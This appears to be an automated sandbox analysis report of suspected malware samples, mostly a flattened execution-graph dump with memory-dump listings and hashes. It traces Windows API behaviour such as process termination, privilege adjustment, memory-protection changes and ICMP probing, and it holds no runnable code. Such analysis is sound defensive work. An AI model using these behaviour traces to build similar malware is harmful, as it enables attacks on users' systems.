                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:58
102719->102732 102736 14e807 39 API calls 102719->102736 102719->102737 102739 13bed9 8 API calls 102719->102739 102741 140340 102719->102741 102764 13be2d 102719->102764 102768 14e7c1 39 API calls 102719->102768 102769 14aa99 224 API calls 102719->102769 102770 1505b2 5 API calls __Init_thread_wait 102719->102770 102771 14bc58 102719->102771 102776 150413 29 API calls __onexit 102719->102776 102777 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102719->102777 102778 14f4df 81 API calls 102719->102778 102779 14f346 224 API calls 102719->102779 102783 13b4c8 8 API calls 102719->102783 102784 18ffaf 8 API calls 102719->102784 102722 18179f 102722->102722 102724->102719 102727->102708 102785 1b6669 81 API calls 102728->102785 102732->102708 102736->102719 102737->102732 102786 1a3fe1 81 API calls __wsopen_s 102737->102786 102739->102719 102743 140376 messages 102741->102743 102742 15014b 8 API calls 102742->102743 102743->102742 102744 141695 102743->102744 102745 18632b 102743->102745 102748 185cdb 102743->102748 102749 18625a 102743->102749 102755 13bed9 8 API calls 102743->102755 102756 1505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102743->102756 102757 14049d messages 102743->102757 102758 13bf73 8 API calls 102743->102758 102759 150413 29 API calls pre_c_initialization 102743->102759 102760 186115 102743->102760 102761 140aae messages 102743->102761 102763 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102743->102763 102787 141990 102743->102787 102849 141e50 102743->102849 102750 13bed9 8 API calls 102744->102750 102744->102757 102862 1a3fe1 81 API calls __wsopen_s 102745->102862 102754 13bed9 8 API calls 102748->102754 102748->102757 102861 1a3fe1 81 API calls __wsopen_s 102749->102861 102750->102757 102754->102757 102755->102743 102756->102743 102757->102719 102758->102743 102759->102743 102859 1a3fe1 81 API calls __wsopen_s 
102760->102859 102860 1a3fe1 81 API calls __wsopen_s 102761->102860 102763->102743 102765 13be38 102764->102765 102766 13be67 102765->102766 103676 13bfa5 102765->103676 102766->102719 102768->102719 102769->102719 102770->102719 102772 15014b 8 API calls 102771->102772 102773 14bc65 102772->102773 102774 13b329 8 API calls 102773->102774 102775 14bc70 102774->102775 102775->102719 102776->102719 102777->102719 102778->102719 102779->102719 102780->102718 102781->102737 102782->102719 102783->102719 102784->102719 102785->102737 102786->102722 102788 1419b6 102787->102788 102789 141a2e 102787->102789 102790 186b60 102788->102790 102791 1419c3 102788->102791 102792 186a4d 102789->102792 102805 141a3d 102789->102805 102869 1b85db 224 API calls 2 library calls 102790->102869 102800 186b84 102791->102800 102801 1419cd 102791->102801 102794 186a58 102792->102794 102795 186b54 102792->102795 102867 14b35c 224 API calls 102794->102867 102868 1a3fe1 81 API calls __wsopen_s 102795->102868 102798 186bb5 102802 186bc0 102798->102802 102803 186be2 102798->102803 102799 140340 224 API calls 102799->102805 102800->102798 102810 186b9c 102800->102810 102809 13bed9 8 API calls 102801->102809 102813 1419e0 messages 102801->102813 102871 1b85db 224 API calls 2 library calls 102802->102871 102872 1b60e6 102803->102872 102804 186979 102866 1a3fe1 81 API calls __wsopen_s 102804->102866 102805->102799 102805->102804 102808 141bb5 102805->102808 102811 186908 102805->102811 102805->102813 102825 141ba9 102805->102825 102830 141af4 102805->102830 102808->102743 102809->102813 102870 1a3fe1 81 API calls __wsopen_s 102810->102870 102865 1a3fe1 81 API calls __wsopen_s 102811->102865 102812 186dd9 102820 186e0f 102812->102820 102952 1b81ce 65 API calls 102812->102952 102813->102812 102846 141a23 messages 102813->102846 102950 1b808f 53 API calls __wsopen_s 102813->102950 102816 141b62 messages 102816->102813 102824 13bed9 8 API calls 102816->102824 102816->102846 102954 13b4c8 8 API calls 
102820->102954 102821 186db7 102826 138ec0 52 API calls 102821->102826 102824->102813 102825->102808 102864 1a3fe1 81 API calls __wsopen_s 102825->102864 102841 186dbf _wcslen 102826->102841 102827 186c08 102879 1a148b 102827->102879 102828 186ded 102832 138ec0 52 API calls 102828->102832 102829 186c81 102948 1a1ad8 8 API calls 102829->102948 102830->102825 102863 141ca0 8 API calls 102830->102863 102845 186df5 _wcslen 102832->102845 102835 18691d messages 102835->102804 102835->102816 102835->102846 102836 186c93 102949 13bd07 8 API calls 102836->102949 102838 141b55 102838->102816 102838->102825 102840 186c9c 102848 1a148b 8 API calls 102840->102848 102841->102812 102951 13b4c8 8 API calls 102841->102951 102845->102820 102953 13b4c8 8 API calls 102845->102953 102846->102743 102848->102813 102852 141e6d messages 102849->102852 102850 142512 102854 141ff7 messages 102850->102854 103675 14be08 39 API calls 102850->103675 102852->102850 102852->102854 102855 187837 102852->102855 102858 18766b 102852->102858 103673 14e322 8 API calls messages 102852->103673 102854->102743 102855->102854 103674 15d2d5 39 API calls 102855->103674 103672 15d2d5 39 API calls 102858->103672 102859->102761 102860->102757 102861->102757 102862->102757 102863->102838 102864->102846 102865->102835 102866->102813 102867->102816 102868->102790 102869->102813 102870->102846 102871->102813 102873 1b6101 102872->102873 102878 186bed 102872->102878 102874 15017b 8 API calls 102873->102874 102876 1b6123 102874->102876 102875 15014b 8 API calls 102875->102876 102876->102875 102876->102878 102955 1a1400 8 API calls 102876->102955 102878->102827 102878->102829 102880 1a1499 102879->102880 102881 186c32 102879->102881 102880->102881 102882 15014b 8 API calls 102880->102882 102883 142b20 102881->102883 102882->102881 102884 142b61 102883->102884 102885 142b86 102884->102885 102886 142fc0 102884->102886 102887 187bd8 102885->102887 102888 142ba0 102885->102888 103200 1505b2 5 API calls __Init_thread_wait 
102886->103200 103163 1b7af9 102887->103163 102956 143160 102888->102956 102891 142fca 102895 13b329 8 API calls 102891->102895 102901 14300b 102891->102901 102894 187be4 102894->102813 102904 142fe4 102895->102904 102896 143160 9 API calls 102897 142bc6 102896->102897 102898 142bfc 102897->102898 102897->102901 102900 187bfd 102898->102900 102924 142c18 __fread_nolock 102898->102924 102899 187bed 102899->102813 103205 1a3fe1 81 API calls __wsopen_s 102900->103205 102901->102899 103202 13b4c8 8 API calls 102901->103202 103201 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102904->103201 102905 143049 103203 14e6e8 224 API calls 102905->103203 102907 187c15 103206 1a3fe1 81 API calls __wsopen_s 102907->103206 102910 142d3f 102911 187c78 102910->102911 102912 142d4c 102910->102912 103208 1b61a2 53 API calls _wcslen 102911->103208 102913 143160 9 API calls 102912->102913 102915 142d59 102913->102915 102918 187da1 102915->102918 102920 143160 9 API calls 102915->102920 102916 15014b 8 API calls 102916->102924 102917 15017b 8 API calls 102917->102924 102929 187c10 102918->102929 103209 1a3fe1 81 API calls __wsopen_s 102918->103209 102919 143082 103204 14fe39 8 API calls 102919->103204 102925 142d73 102920->102925 102923 140340 224 API calls 102923->102924 102924->102905 102924->102907 102924->102910 102924->102916 102924->102917 102924->102923 102926 187c59 102924->102926 102924->102929 102925->102918 102928 13bed9 8 API calls 102925->102928 102931 142dd7 messages 102925->102931 103207 1a3fe1 81 API calls __wsopen_s 102926->103207 102928->102931 102929->102813 102930 143160 9 API calls 102930->102931 102931->102918 102931->102919 102931->102929 102931->102930 102934 142e8b messages 102931->102934 102966 138bda 102931->102966 103041 1b9ffc 102931->103041 103044 14ac3e 102931->103044 103063 1ba5b2 102931->103063 103069 1ba6aa 102931->103069 103077 1af94a 102931->103077 103086 1a664c 102931->103086 103093 1b9fe8 102931->103093 103096 1bad47 
102931->103096 103101 1ba9ac 102931->103101 103109 1b0fb8 102931->103109 103134 14f950 102931->103134 103141 1bab3f 102931->103141 102932 142f2d 102932->102813 102934->102932 103199 14e322 8 API calls messages 102934->103199 102948->102836 102949->102840 102950->102821 102951->102812 102952->102828 102953->102820 102954->102846 102955->102876 102957 1431a1 102956->102957 102958 14317d 102956->102958 103210 1505b2 5 API calls __Init_thread_wait 102957->103210 102965 142bb0 102958->102965 103212 1505b2 5 API calls __Init_thread_wait 102958->103212 102961 1431ab 102961->102958 103211 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102961->103211 102962 149f47 102962->102965 103213 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102962->103213 102965->102896 102967 138ec0 52 API calls 102966->102967 102968 138bf9 102967->102968 102969 138ec0 52 API calls 102968->102969 102970 138c0e 102969->102970 102971 138ec0 52 API calls 102970->102971 102972 138c21 102971->102972 102973 138ec0 52 API calls 102972->102973 102974 138c37 102973->102974 103214 137ad5 102974->103214 102977 176767 102980 137e12 8 API calls 102977->102980 102979 138c72 102979->102977 103009 138c98 try_get_first_available_module 102979->103009 102981 176786 102980->102981 102982 138470 8 API calls 102981->102982 102983 176798 102982->102983 102986 138a60 8 API calls 102983->102986 103014 1767bd 102983->103014 102985 138ec0 52 API calls 102989 138d27 102985->102989 102986->103014 102988 138d3c 103238 137e12 102988->103238 102995 138ec0 52 API calls 102989->102995 102990 176873 102993 17687d 102990->102993 102994 1768bc 102990->102994 102991 138d5c 102996 138d71 102991->102996 102997 17696e 102991->102997 102999 138470 8 API calls 102993->102999 103000 138470 8 API calls 102994->103000 102995->102988 103244 138470 102996->103244 102998 138470 8 API calls 102997->102998 103003 17697b 102998->103003 103004 176885 102999->103004 103005 1768c5 103000->103005 103002 
13893c 8 API calls 103002->103014 103010 138a60 8 API calls 103003->103010 103011 138ec0 52 API calls 103004->103011 103012 138a60 8 API calls 103005->103012 103007 13bd57 8 API calls 103036 138d91 try_get_first_available_module 103007->103036 103008 138a60 8 API calls 103008->103014 103009->102985 103009->102988 103009->103036 103010->103036 103015 176897 103011->103015 103013 1768e1 103012->103013 103019 138ec0 52 API calls 103013->103019 103014->103002 103014->103008 103039 138e71 103014->103039 103250 138844 8 API calls __fread_nolock 103014->103250 103251 138844 8 API calls __fread_nolock 103015->103251 103017 1768ab 103020 13893c 8 API calls 103017->103020 103021 1768fc 103019->103021 103022 1768b9 103020->103022 103252 138844 8 API calls __fread_nolock 103021->103252 103030 138a60 8 API calls 103022->103030 103023 13893c 8 API calls 103023->103036 103025 1769f1 103224 13893c 103025->103224 103026 1769c1 103026->103025 103031 1769e5 103026->103031 103027 138a60 8 API calls 103027->103036 103029 176910 103034 13893c 8 API calls 103029->103034 103030->103039 103253 13ad40 8 API calls __fread_nolock 103031->103253 103034->103022 103035 1769ef 103036->103023 103036->103026 103036->103027 103036->103039 103249 138844 8 API calls __fread_nolock 103036->103249 103038 176a12 103040 13bd57 8 API calls 103038->103040 103039->102931 103040->103035 103269 1b89b6 103041->103269 103043 1ba00c 103043->102931 103045 138ec0 52 API calls 103044->103045 103046 14ac68 103045->103046 103047 14bc58 8 API calls 103046->103047 103048 14ac7f 103047->103048 103049 13c98d 39 API calls 103048->103049 103051 14b09b _wcslen 103048->103051 103049->103051 103050 14bbbe 43 API calls 103050->103051 103051->103050 103053 137ad5 8 API calls 103051->103053 103056 136c03 8 API calls 103051->103056 103057 13c98d 39 API calls 103051->103057 103058 14b1fb 103051->103058 103059 138ec0 52 API calls 103051->103059 103060 138577 8 API calls 103051->103060 103372 13396b 103051->103372 103382 133907 
103051->103382 103386 154d98 103051->103386 103396 13ad40 8 API calls __fread_nolock 103051->103396 103397 137b1a 8 API calls 103051->103397 103053->103051 103056->103051 103057->103051 103058->102931 103059->103051 103060->103051 103065 1ba5c5 103063->103065 103064 138ec0 52 API calls 103066 1ba632 103064->103066 103065->103064 103068 1ba5d4 103065->103068 103458 1a18a9 103066->103458 103068->102931 103070 1ba705 103069->103070 103076 1ba6c5 103069->103076 103071 1ba723 103070->103071 103072 13c98d 39 API calls 103070->103072 103073 13c98d 39 API calls 103071->103073 103074 1ba780 103071->103074 103071->103076 103072->103071 103073->103074 103502 1a0372 103074->103502 103076->102931 103078 15017b 8 API calls 103077->103078 103079 1af95b 103078->103079 103080 13423c 8 API calls 103079->103080 103081 1af965 103080->103081 103082 138ec0 52 API calls 103081->103082 103083 1af97c GetEnvironmentVariableW 103082->103083 103560 1a160f 8 API calls 103083->103560 103085 1af999 messages 103085->102931 103087 138ec0 52 API calls 103086->103087 103088 1a6662 103087->103088 103561 19dc54 103088->103561 103090 1a666a 103091 1a666e GetLastError 103090->103091 103092 1a6683 103090->103092 103091->103092 103092->102931 103094 1b89b6 119 API calls 103093->103094 103095 1b9ff8 103094->103095 103095->102931 103097 138ec0 52 API calls 103096->103097 103098 1bad63 103097->103098 103630 19dd87 CreateToolhelp32Snapshot Process32FirstW 103098->103630 103100 1bad72 103100->102931 103103 1baa08 103101->103103 103108 1ba9c8 103101->103108 103102 1baa26 103104 13c98d 39 API calls 103102->103104 103106 1baa8e 103102->103106 103102->103108 103103->103102 103105 13c98d 39 API calls 103103->103105 103104->103106 103105->103102 103107 1a0372 58 API calls 103106->103107 103107->103108 103108->102931 103110 1b0fe1 103109->103110 103111 1b100f WSAStartup 103110->103111 103112 13c98d 39 API calls 103110->103112 103113 1b1054 103111->103113 103133 1b1023 messages 103111->103133 103115 1b0ffc 
103112->103115 103649 14c1f6 103113->103649 103115->103111 103117 13c98d 39 API calls 103115->103117 103119 1b100b 103117->103119 103118 138ec0 52 API calls 103120 1b1069 103118->103120 103119->103111 103654 14f9d4 WideCharToMultiByte 103120->103654 103122 1b1075 inet_addr gethostbyname 103123 1b1093 IcmpCreateFile 103122->103123 103122->103133 103124 1b10d3 103123->103124 103123->103133 103125 15017b 8 API calls 103124->103125 103126 1b10ec 103125->103126 103127 13423c 8 API calls 103126->103127 103128 1b10f7 103127->103128 103129 1b112b IcmpSendEcho 103128->103129 103130 1b1102 IcmpSendEcho 103128->103130 103132 1b114c 103129->103132 103130->103132 103131 1b1212 IcmpCloseHandle WSACleanup 103131->103133 103132->103131 103133->102931 103135 13c98d 39 API calls 103134->103135 103136 14f964 103135->103136 103137 18fb20 Sleep 103136->103137 103138 14f96c timeGetTime 103136->103138 103139 13c98d 39 API calls 103138->103139 103140 14f982 103139->103140 103140->102931 103142 138ec0 52 API calls 103141->103142 103143 1bab62 103142->103143 103144 19dd87 46 API calls 103143->103144 103145 1bab73 103144->103145 103146 1babc3 OpenProcess 103145->103146 103153 1bab78 103145->103153 103147 1babdd GetLastError 103146->103147 103148 1bacc2 TerminateProcess 103146->103148 103151 1babec 103147->103151 103159 1bac72 103147->103159 103149 1baccf GetLastError 103148->103149 103150 1bad20 CloseHandle 103148->103150 103156 1bace3 103149->103156 103150->103153 103664 19d715 12 API calls 103151->103664 103153->102931 103154 1babfa 103665 192010 11 API calls messages 103154->103665 103156->103150 103157 1bac04 103158 1bac08 OpenProcess 103157->103158 103160 1bac1a 103157->103160 103158->103160 103159->103148 103159->103153 103666 191a0b AdjustTokenPrivileges CloseHandle messages 103160->103666 103162 1bac70 103162->103159 103164 1b7b38 103163->103164 103165 1b7b52 103163->103165 103667 1a3fe1 81 API calls __wsopen_s 103164->103667 103167 1b60e6 8 API calls 103165->103167 103168 1b7b5d 
103167->103168 103169 140340 223 API calls 103168->103169 103170 1b7bc1 103169->103170 103171 1b7b4a 103170->103171 103172 1b7c5c 103170->103172 103173 1b7c03 103170->103173 103171->102894 103174 1b7cb0 103172->103174 103176 1b7c62 103172->103176 103179 1a148b 8 API calls 103173->103179 103174->103171 103175 138ec0 52 API calls 103174->103175 103177 1b7cc2 103175->103177 103668 1a1ad8 8 API calls 103176->103668 103180 13c2c9 8 API calls 103177->103180 103183 1b7c3b 103179->103183 103184 1b7ce6 CharUpperBuffW 103180->103184 103181 1b7c85 103669 13bd07 8 API calls 103181->103669 103185 142b20 223 API calls 103183->103185 103186 1b7d00 103184->103186 103185->103171 103187 1b7d53 103186->103187 103188 1b7d07 103186->103188 103189 138ec0 52 API calls 103187->103189 103191 1a148b 8 API calls 103188->103191 103190 1b7d5b 103189->103190 103670 14aa65 9 API calls 103190->103670 103193 1b7d35 103191->103193 103194 142b20 223 API calls 103193->103194 103194->103171 103195 1b7d65 103195->103171 103196 138ec0 52 API calls 103195->103196 103197 1b7d80 103196->103197 103671 13bd07 8 API calls 103197->103671 103199->102934 103200->102891 103201->102901 103202->102905 103203->102919 103204->102919 103205->102929 103206->102929 103207->102929 103208->102925 103209->102929 103210->102961 103211->102958 103212->102962 103213->102965 103215 15017b 8 API calls 103214->103215 103216 137afa 103215->103216 103217 15014b 8 API calls 103216->103217 103218 137b08 103217->103218 103218->102977 103219 13c98d 103218->103219 103220 13c99e 103219->103220 103221 13c9a5 103219->103221 103220->103221 103254 156641 39 API calls _strftime 103220->103254 103221->102979 103223 13c9e8 103223->102979 103225 15014b 8 API calls 103224->103225 103226 13894a 103225->103226 103227 138a60 103226->103227 103228 138a76 103227->103228 103229 176737 103228->103229 103235 138a80 103228->103235 103255 14b7a2 8 API calls 103229->103255 103231 176744 103256 13b4c8 8 API calls 103231->103256 103233 176762 103233->103233 
103234 138b94 103236 15014b 8 API calls 103234->103236 103235->103231 103235->103234 103237 138b9b 103235->103237 103236->103237 103237->103038 103239 137e1a 103238->103239 103240 15014b 8 API calls 103239->103240 103241 137e28 103240->103241 103257 138445 103241->103257 103260 13c760 103244->103260 103246 138480 103247 15017b 8 API calls 103246->103247 103248 13851c 103246->103248 103247->103248 103248->103007 103249->103036 103250->103014 103251->103017 103252->103029 103253->103035 103254->103223 103255->103231 103256->103233 103258 15014b 8 API calls 103257->103258 103259 137e30 103258->103259 103259->102990 103259->102991 103261 13c76b 103260->103261 103262 181285 103261->103262 103267 13c773 messages 103261->103267 103263 15014b 8 API calls 103262->103263 103265 181291 103263->103265 103264 13c77a 103264->103246 103267->103264 103268 13c7e0 8 API calls messages 103267->103268 103268->103267 103270 138ec0 52 API calls 103269->103270 103271 1b89ed 103270->103271 103293 1b8a32 messages 103271->103293 103307 1b9730 103271->103307 103273 1b8cde 103274 1b8eac 103273->103274 103278 1b8cec 103273->103278 103346 1b9941 59 API calls 103274->103346 103277 1b8ebb 103277->103278 103279 1b8ec7 103277->103279 103320 1b88e3 103278->103320 103279->103293 103280 138ec0 52 API calls 103298 1b8aa6 103280->103298 103285 1b8d25 103334 14ffe0 103285->103334 103288 1b8d5f 103290 137e12 8 API calls 103288->103290 103289 1b8d45 103341 1a3fe1 81 API calls __wsopen_s 103289->103341 103294 1b8d6e 103290->103294 103292 1b8d50 GetCurrentProcess TerminateProcess 103292->103288 103293->103043 103295 138470 8 API calls 103294->103295 103296 1b8d87 103295->103296 103304 1b8daf 103296->103304 103342 141ca0 8 API calls 103296->103342 103298->103273 103298->103280 103298->103293 103339 194ad3 8 API calls __fread_nolock 103298->103339 103340 1b8f7a 41 API calls _strftime 103298->103340 103299 1b8f22 103299->103293 103301 1b8f36 FreeLibrary 103299->103301 103300 1b8d9e 103343 1b95d8 74 API calls 
103300->103343 103301->103293 103304->103299 103344 141ca0 8 API calls 103304->103344 103345 13b4c8 8 API calls 103304->103345 103347 1b95d8 74 API calls 103304->103347 103308 13c2c9 8 API calls 103307->103308 103309 1b974b CharLowerBuffW 103308->103309 103348 199805 103309->103348 103313 13bf73 8 API calls 103314 1b9787 103313->103314 103355 13acc0 103314->103355 103316 1b979b 103317 13adf4 8 API calls 103316->103317 103319 1b97a5 _wcslen 103317->103319 103318 1b98bb _wcslen 103318->103298 103319->103318 103367 1b8f7a 41 API calls _strftime 103319->103367 103321 1b88fe 103320->103321 103322 1b8949 103320->103322 103323 15017b 8 API calls 103321->103323 103326 1b9af3 103322->103326 103324 1b8920 103323->103324 103324->103322 103325 15014b 8 API calls 103324->103325 103325->103324 103327 1b9d08 messages 103326->103327 103332 1b9b17 _strcat _wcslen ___std_exception_copy 103326->103332 103327->103285 103328 13c63f 39 API calls 103328->103332 103329 13c98d 39 API calls 103329->103332 103330 13ca5b 39 API calls 103330->103332 103331 138ec0 52 API calls 103331->103332 103332->103327 103332->103328 103332->103329 103332->103330 103332->103331 103371 19f8c5 10 API calls _wcslen 103332->103371 103335 14fff5 103334->103335 103336 15008d NtProtectVirtualMemory 103335->103336 103337 15005b 103335->103337 103338 15007b CloseHandle 103335->103338 103336->103337 103337->103288 103337->103289 103338->103337 103339->103298 103340->103298 103341->103292 103342->103300 103343->103304 103344->103304 103345->103304 103346->103277 103347->103304 103349 199825 _wcslen 103348->103349 103351 19985a 103349->103351 103353 199919 103349->103353 103354 199914 103349->103354 103351->103354 103368 14e36b 41 API calls 103351->103368 103353->103354 103369 14e36b 41 API calls 103353->103369 103354->103313 103354->103319 103356 13ace1 103355->103356 103366 13accf 103355->103366 103360 13ad07 103356->103360 103361 180557 103356->103361 103356->103366 103357 13acda __fread_nolock 103357->103316 103358 
13c2c9 8 API calls 103359 1805a3 __fread_nolock 103358->103359 103370 1388e8 8 API calls 103360->103370 103362 15014b 8 API calls 103361->103362 103364 180561 103362->103364 103365 15017b 8 API calls 103364->103365 103365->103366 103366->103357 103366->103358 103367->103318 103368->103351 103369->103353 103370->103357 103371->103332 103373 133996 ___scrt_fastfail 103372->103373 103398 135f32 103373->103398 103377 133a3a Shell_NotifyIconW 103402 1361a9 103377->103402 103378 1740cd Shell_NotifyIconW 103380 133a50 103380->103051 103381 133a1c 103381->103377 103381->103378 103383 133969 103382->103383 103384 133919 ___scrt_fastfail 103382->103384 103383->103051 103385 133938 Shell_NotifyIconW 103384->103385 103385->103383 103387 154e1b 103386->103387 103388 154da6 103386->103388 103457 154e2d 40 API calls 4 library calls 103387->103457 103394 154dcb 103388->103394 103455 15f649 20 API calls __dosmaperr 103388->103455 103391 154e28 103391->103051 103392 154db2 103456 162b5c 26 API calls __fread_nolock 103392->103456 103394->103051 103395 154dbd 103395->103051 103396->103051 103397->103051 103399 1339eb 103398->103399 103400 135f4e 103398->103400 103399->103381 103432 19d11f 42 API calls _strftime 103399->103432 103400->103399 103401 175070 DestroyIcon 103400->103401 103401->103399 103403 1361c6 103402->103403 103421 1362a8 103402->103421 103404 137ad5 8 API calls 103403->103404 103405 1361d4 103404->103405 103406 1361e1 103405->103406 103407 175278 LoadStringW 103405->103407 103408 138577 8 API calls 103406->103408 103410 175292 103407->103410 103409 1361f6 103408->103409 103411 136203 103409->103411 103418 1752ae 103409->103418 103413 13bed9 8 API calls 103410->103413 103417 136229 ___scrt_fastfail 103410->103417 103411->103410 103412 13620d 103411->103412 103414 136b7c 8 API calls 103412->103414 103413->103417 103415 13621b 103414->103415 103433 137bb5 103415->103433 103419 13628e Shell_NotifyIconW 103417->103419 103418->103417 103420 13bf73 8 API calls 103418->103420 
103430 1752f1 103418->103430 103419->103421 103422 1752d8 103420->103422 103421->103380 103442 19a350 9 API calls 103422->103442 103425 175310 103427 136b7c 8 API calls 103425->103427 103426 1752e3 103428 137bb5 8 API calls 103426->103428 103429 175321 103427->103429 103428->103430 103431 136b7c 8 API calls 103429->103431 103443 14fe6f 51 API calls 103430->103443 103431->103417 103432->103381 103434 137bc7 103433->103434 103435 17641d 103433->103435 103444 137bd8 103434->103444 103454 1913c8 8 API calls __fread_nolock 103435->103454 103438 137bd3 103438->103417 103439 176427 103440 13bed9 8 API calls 103439->103440 103441 176433 103439->103441 103440->103441 103442->103426 103443->103425 103445 137be7 103444->103445 103451 137c1b __fread_nolock 103444->103451 103446 17644e 103445->103446 103447 137c0e 103445->103447 103445->103451 103448 15014b 8 API calls 103446->103448 103449 137d74 8 API calls 103447->103449 103450 17645d 103448->103450 103449->103451 103452 15017b 8 API calls 103450->103452 103451->103438 103453 176491 __fread_nolock 103452->103453 103454->103439 103455->103392 103456->103395 103457->103391 103459 1a18b6 103458->103459 103460 15014b 8 API calls 103459->103460 103461 1a18bd 103460->103461 103464 19fcb5 103461->103464 103463 1a18f7 103463->103068 103465 13c2c9 8 API calls 103464->103465 103466 19fcc8 CharLowerBuffW 103465->103466 103467 19fcdb 103466->103467 103468 19fce5 ___scrt_fastfail 103467->103468 103469 13655e 8 API calls 103467->103469 103470 19fd19 103467->103470 103468->103463 103469->103467 103471 19fd2b 103470->103471 103497 13655e 103470->103497 103473 15017b 8 API calls 103471->103473 103476 19fd59 103473->103476 103478 19fd7b 103476->103478 103500 19fbed 8 API calls 103476->103500 103477 19fdb8 103477->103468 103479 15014b 8 API calls 103477->103479 103482 19fe0c 103478->103482 103480 19fdd2 103479->103480 103481 15017b 8 API calls 103480->103481 103481->103468 103483 13bf73 8 API calls 103482->103483 103484 19fe3e 103483->103484 

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00135FF7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,001CDC2C,00000000,?,?), ref: 00136123
                                                                                                                                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 0013612A
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00136155
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00136167
                                                                                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00136175
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013617C
                                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 001361A1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                          • Opcode ID: f3b342313a9d7fe41d542e2d6a4aaf8cd4169691a7dbc21d1b043f2728df9cbf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 35a37eadcd53acc7a4f7d40540876aa844ecd9c76dd1ef26e0b507b03133a6b9
